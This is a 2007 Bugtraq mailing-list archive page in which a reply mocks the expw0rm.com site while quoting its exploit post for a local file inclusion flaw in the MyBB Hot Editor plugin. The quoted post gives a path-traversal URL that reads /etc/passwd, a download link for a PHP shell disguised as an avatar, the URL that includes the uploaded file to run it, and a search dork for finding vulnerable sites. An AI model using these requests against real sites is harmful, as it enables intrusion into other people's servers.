| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 9 Apr 2007 13:08:18 -0400 From: "Kevin Finisterre (lists)" <kf_lists@...italmunition.com> To: liz0@...w0rm.com Cc: bugtraq@...urityfocus.com, str0ke <str0ke@...w0rm.com> Subject: Re: Mybb Hot Editor Plugin Local File Inclusion expw0rm dude? That is a pretty weak attempt at mirroring milw0rm.com you pretty much copied str0kes layout except you added your own crappy colors. how nice of you. -KF On Apr 9, 2007, at 9:40 AM, liz0@...w0rm.com wrote: > <?php > /* > Vendor : Liz0ziM > Web : www.expw0rm.com > Mail : liz0@...w0rm.com > --------------------------------------- > Vul. Code : keyboard.php line 3 > > > require_once "./vk_code/$first"; > ---------------------------------------- > > > */ > > http://victim.com/[path]/richedit/keyboard.php? > first=../../../../../../../../../../../../../../../../../etc/passwd > > And > > upload php shell = > http://www.expw0rm.com/avatar_36.zip > > http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/ > avatars/avatar_36.gif => target isn't show with ie.plese you use > firefox > > Dork: "MTR Paket :" > ?> > > // Exploit Worm www.expw0rm.com > > orginal: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file- > inclusion_no114.html
Powered by blists - more mailing lists